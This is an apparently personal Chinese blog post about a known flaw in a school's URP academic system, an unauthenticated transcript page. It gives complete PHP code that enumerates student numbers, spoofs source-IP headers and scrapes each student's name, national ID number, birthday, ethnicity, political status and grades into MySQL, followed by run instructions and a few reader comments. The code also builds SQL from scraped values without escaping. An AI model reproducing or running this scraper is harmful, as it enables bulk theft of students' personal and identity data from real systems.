前述:
刚到一个新学校,看到群里说要去222.132.XX.XXX:80833(此处应该是写通知的老师错误,反正我是没找到80833端口),通过尔雅选选修课,出于习惯,检查了下这个IP,发现8080端口还跑着URP综合教务系统。。
前期探索:
去wooyun.org查了下相关内容,发现好多关于URP的洞,如图:
查询到cj_zwcjd.jsp这个文件,便利用了一下,正好练习一下PHP脚本。
查询流程:
用户访问cj_zwcjd.jsp页面->输入学号->点击查询->存在一个302跳转->获取反馈结果页面
程序环境:
- PHP 5.5.9 (附加:swoole 以及 Simple HTML DOM)
- MySQL 5.5.44 (主要为了记录接下来获取的信息)
部分相关介绍:
- swoole用起来感觉还不错,从之前的代码中直接copy使用了,附上一个相关的参考链接:http://rango.swoole.com/archives/265
- 为了解析接下来获取到的HTML代码,使用了Simple HTML DOM这个插件,同样附上一个参考链接:http://www.phpddt.com/manual/simplehtmldom_1_5/manual.htm
实现功能:
软件根据预设形成一个学号,并通过此学号查询此人的成绩单,查到会自动将返回的html解析,最后插入MySQL数据库中,可以获取的信息有:姓名、性别、照片(由于我这个学校的URP里没照片,没做进一步提取)、籍贯、身份证号、班级、专业、政治面貌、民族、系、学院、课程及相应成绩
软件目录结构:
注:./class/plug/simplehtmldom_1_5 这个目录下是Simple HTML DOM扩展哈
PHP文件代码
- ./config/config.inc.php (一些配置信息)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-18 * Time: 下午8:58 */ define('REQUEST_URL','222.132.XX.XXX'); define('REQUEST_PORT','8080'); //访问间隔,秒 define('REQUEST_SPEED',5);
- ./class/htmlFilter.class.php (HTML解析相关)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-19 * Time: 下午4:57 */ class htmlFilter extends sMySQL { private $htmlObj; //html对象 /* * 构造函数 */ public function __construct($html){ $this->htmlObj = new simple_html_dom(); $this->htmlObj->load($html); //从html字符加载 //$this->htmlObj->load_file($html); //从文件加载 $this->sqlLive = parent::__construct(); } /* * 获取照片功能 * 由于没有测试环境,暂时取消 */ private function getPhoto(){ $photoArr = $this->htmlObj->find('img'); foreach ($photoArr as $a ){ echo $a->outertext; } } /* * 记录信息(SQL) */ private function recordStudentInfoSQL($studentBasicInfoArr,$courseInfoJSON){ //生成SQL $sql = "INSERT INTO `studentInfo`(`id_card`,`real_name`,`student_id`,`sex`,`nation`,`native_place`,`political_status`, `birthday`,`class_name`,`entrance_time`,`graduation_date`,`major`,`major_direction`,`department`,`cultivation_plan`,`courseInfo`) VALUES( '{$studentBasicInfoArr['idCard']}','{$studentBasicInfoArr['realName']}','{$studentBasicInfoArr['studentID']}','{$studentBasicInfoArr['sex']}', '{$studentBasicInfoArr['nation']}','{$studentBasicInfoArr['nativePlace']}','{$studentBasicInfoArr['politicalStatus']}','{$studentBasicInfoArr['birthday']}', '{$studentBasicInfoArr['className']}','{$studentBasicInfoArr['entranceTime']}','{$studentBasicInfoArr['graduationDate']}','{$studentBasicInfoArr['major']}', '{$studentBasicInfoArr['majorDirection']}','{$studentBasicInfoArr['department']}','{$studentBasicInfoArr['cultivationPlan']}','$courseInfoJSON')"; $this->sqlLive->send($sql); $res = unserialize($this->sqlLive->recv()); if ($res){ return true; } else { return false; } } /* * 解析HTML获取学生所有信息 * */ private function getAndRecordStudentInfo(){ $trInfoArr = $this->htmlObj->find('td[class="report1_2_1"]'); $studentBasicInfoArr = array( 'realName' => iconv('GBK', 'UTF-8',$trInfoArr[1]->innertext), //姓名 'studentID' => iconv('GBK', 'UTF-8',$trInfoArr[3]->innertext), //学号 'sex' => iconv('GBK', 'UTF-8',$trInfoArr[4]->innertext), //性别 'idCard' => iconv('GBK', 'UTF-8',$trInfoArr[6]->innertext), //身份证号码 'nation' => iconv('GBK', 'UTF-8',$trInfoArr[9]->innertext), //民族 'nativePlace' => iconv('GBK', 'UTF-8',$trInfoArr[11]->innertext), //籍贯 'politicalStatus' => iconv('GBK', 'UTF-8',$trInfoArr[13]->innertext), //政治面貌 'birthday' => iconv('GBK', 'UTF-8',$trInfoArr[15]->innertext), //出生日期 'className' => iconv('GBK', 'UTF-8',$trInfoArr[17]->innertext), //班级 'entranceTime' => iconv('GBK', 'UTF-8',$trInfoArr[19]->innertext), //入学时间 'graduationDate' => iconv('GBK', 'UTF-8',$trInfoArr[21]->innertext), //毕业日期 'major' => iconv('GBK', 'UTF-8',$trInfoArr[23]->innertext), //专业 'majorDirection' => iconv('GBK', 'UTF-8',$trInfoArr[25]->innertext), //专业方向 'department' => iconv('GBK', 'UTF-8',$trInfoArr[27]->innertext), //系所 'cultivationPlan' => iconv('GBK', 'UTF-8',$trInfoArr[29]->innertext) //培养方案 ); for ($i=40;$i<count($trInfoArr)-9;$i+=5){ $courseInfoArr[] = array( 'courseName' => iconv('GBK', 'UTF-8',$trInfoArr[$i]->innertext), //课程名称 'score' => iconv('GBK', 'UTF-8',$trInfoArr[$i+1]->innertext), //课程分数 'studyMode' => iconv('GBK', 'UTF-8',$trInfoArr[$i+2]->innertext), //修读方式 'courseType' => iconv('GBK', 'UTF-8',$trInfoArr[$i+3]->innertext), //课程属性 'examDate' => iconv('GBK', 'UTF-8',$trInfoArr[$i+4]->innertext) //考试时间 ); } //json编码 //echo strlen(json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE)); if ($this->recordStudentInfoSQL($studentBasicInfoArr,json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE)) == true){ return true; } else { return false; } } /* * 解析结果返回页面的html */ public function htmlAnalysis(){ //获取照片功能 //$this->getPhoto(); //获取并记录学生所有信息 if ($this->getAndRecordStudentInfo() == true){ return true; } else { return false; } } /* * 析构函数 */ public function __destruct(){ $this->htmlObj->clear(); } }
- ./class/request.class.php (主要为了做POST与GET请求)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-18 * Time: 下午9:02 */ class request { static private $header; //http头部 private $url; //URL private function setURL($url){ $this->url = $url; } public function getURL(){ return $this->url; } /* * 构造函数 */ public function __construct($url,$sourceIP = ''){ //如果未设置源IP if (empty($sourceIP)){ $sourceIP = $this->createIP(); } //设置头部信息 self::$header = array( 'CLIENT-IP:'.$sourceIP, 'X-FORWARDED-FOR:8.8.8.8' ); //设置url $this->setURL($url); } /* * 可选设置header */ public function setHeader($headerArr){ //Header为数组 if (!is_array($headerArr)){ echo '如果需要设置$header请传入一个数组'; exit; } //设置header self::$header = $headerArr; } /* * 创建一个IP地址 */ private function createIP(){ $ip_1_arr = array('214','123','54','53','222','215','10','16'); $ip_2 = round(rand(600000,2550000)/10000); $ip_3 = round(rand(600000,2550000)/10000); $ip_4 = round(rand(600000,2550000)/10000); $randArr = mt_rand(0,count($ip_1_arr)-1); $ip_1 = $ip_1_arr[$randArr]; return $ip_1.'.'.$ip_2.'.'.$ip_3.'.'.$ip_4; } /* * 通过curl发送POST请求 */ public function httpPostParams($postDataArr){ if (!is_array($postDataArr)){ echo 'post提交的数据请以数组的形式传入'; exit; } $postData = ''; foreach($postDataArr as $key => $val){ $postData .= $key .'=' .$val.'&'; } $curl = curl_init(); curl_setopt($curl,CURLOPT_HEADER,self::$header); curl_setopt($curl,CURLOPT_URL,$this->url); curl_setopt ($curl,CURLOPT_POSTFIELDS, $postData); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'); $result = curl_exec($curl); $httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE); curl_close($curl); switch ($httpCode){ case '302':{ return $result; } break; default:{ return false; } } } /* * 通过curl进行GET请求 */ public function httpGetParams($url = ''){ $curl = curl_init($url); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'); $result = curl_exec($curl); $httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE); curl_close($curl); //echo $url; switch ($httpCode){ case '200':{ return $result; } break; default:{ return false; } } } }
- ./class/stringFilter.php (字符串过滤,主要为了获取a标签中的href值)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-19 * Time: 下午4:40 */ class stringFilter { /* * 构造函数 */ public function __construct(){ } /* * 获取302跳转后的a标签的href */ public function getTagA_Href($html){ return str_replace('="','',strstr(strstr($html,'="',false),'">',true)); //strstr(strstr($html,'="',false),'">',true); //strstr($html,'<a ',false); } /* * 通过HTML获取结果页面的PDF下载链接 */ public function getStudentInfoPdfDownload($html){ } }
- ./class/studentID.class.php (这个想了想,还需要改很多,就先临时简单处理了一下)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-20 * Time: 下午8:45 */ class studentID { private static $grade; //年级 /* * 构造函数 * 形参:年级 */ public function __construct($grade){ self::$grade = $grade; } /* * 创建学号信息 */ public function createStudentID($departmentNum = 1000,$studentNum = 1000){ return self::$grade.$departmentNum.$studentNum; } }
- ./do_cli.php (CLI模式下执行主程序)
<?php /** * Created by PhpStorm. * User: henry * Date: 15-10-18 * Time: 下午8:58 */ require_once 'config/config.inc.php'; require_once 'class/request.class.php'; require_once 'class/sMySQL.class.php'; require_once 'class/htmlFilter.class.php'; require_once 'class/stringFilter.class.php'; require_once 'class/plug/simplehtmldom_1_5/simple_html_dom.php'; require_once 'class/studentID.class.php'; //设置URL $url = REQUEST_URL.':'.REQUEST_PORT.'/setReportParams'; $req = new request($url); $stuID = new studentID(2012); $getA_Href = new stringFilter(); //学院编号循环 for ($d=1270;$d<8000;$d++){ //学生编号循环 for ($s=1001;$s<8000;$s++){ //创建POST值 $postData = array( 'LS_XH' => $stuID->createStudentID($d,$s), 'resultPage'=> 'http%3A%2F%2F222.132.XX.XXX%3A8080%2FreportFiles%2Fcj%2Fcj_zwcjd.jsp' ); //POST请求新的请求 $result = $req->httpPostParams($postData); //如果返回302 if ($result != false){ //获取A标签的href值,再根据A标签重新设定url,进行GET请求 $html = $req->httpGetParams($getA_Href->getTagA_Href($result)); //如果成功获取html数据 if ($html != false){ $record = new htmlFilter($html); //记录数据 if ($record->htmlAnalysis() == true){ echo 'success!'; } else { echo 'record fail!'; } $record->__destruct(); } else { echo 'get html page fail!'; } } sleep(REQUEST_SPEED); } }
执行:
Linux下,进入do_cli.php的目录下,直接执行:#php do_cli.php
注意问题:
- 由于用到swoole扩展,需要通过命令#php -m检查是否包含此模块。
- 记得先启用swoole监听程序,然后否则会记录失败。
- 要注意通过curl请求的时候,加入一个userAgent,否则系统返回500错误 – –
执行结果截图:
注:本来想直接获取PDF/Text/Excel文件得了,后来想了想,不如存在数据库里面方便,就把成绩单的课程相关内容,转成了JSON格式存储在数据库中。
后续:
这第一个版本,还有很多地方没处理,如:多线程、学号相关、错误输出不人性等等,仅供学习与记录吧。
66666
赞~
Hi i am kavin, its my first occasion to commenting anywhere,
when i read this piece of writing i thought i could also make comment due to this good piece of
writing.